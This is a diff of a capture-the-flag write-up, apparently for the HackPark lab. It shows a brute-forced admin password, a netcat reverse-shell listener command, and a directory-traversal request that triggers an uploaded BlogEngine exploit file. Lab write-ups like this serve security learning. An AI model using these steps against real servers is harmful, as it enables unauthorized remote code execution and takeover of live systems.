bharathkarumudi/bharathkarumudi.github.io/5_HackPark.md

 The brute force attack found the password for admin account as: 1qaz2wsx

 ### Getting a reverse shell
-Using the [exploit](https://www.exploit-db.com/exploits/46353) , update the local host ip in it and upload the file with the name as PostView.ascx using the post editor.
+- Using the [exploit](https://www.exploit-db.com/exploits/46353), update the local host ip in it and upload the file with the name as PostView.ascx using the post editor.
-Open a netcat session to receive the reverse shell connection `nc -lnvp 4445` Run the exploit with directory traversal `10.10.73.64/?theme=../../App_Data/files` The reverse shell should be established on the netcat session.
+- Open a netcat session to receive a reverse shell connection `nc -lnvp 4445` Run the exploit with directory traversal `10.10.73.64/?theme=../../App_Data/files`
+- The reverse shell should be established on the netcat session.
+-

     $ nc -lnvp 4445
     listening on [any] 4445 ...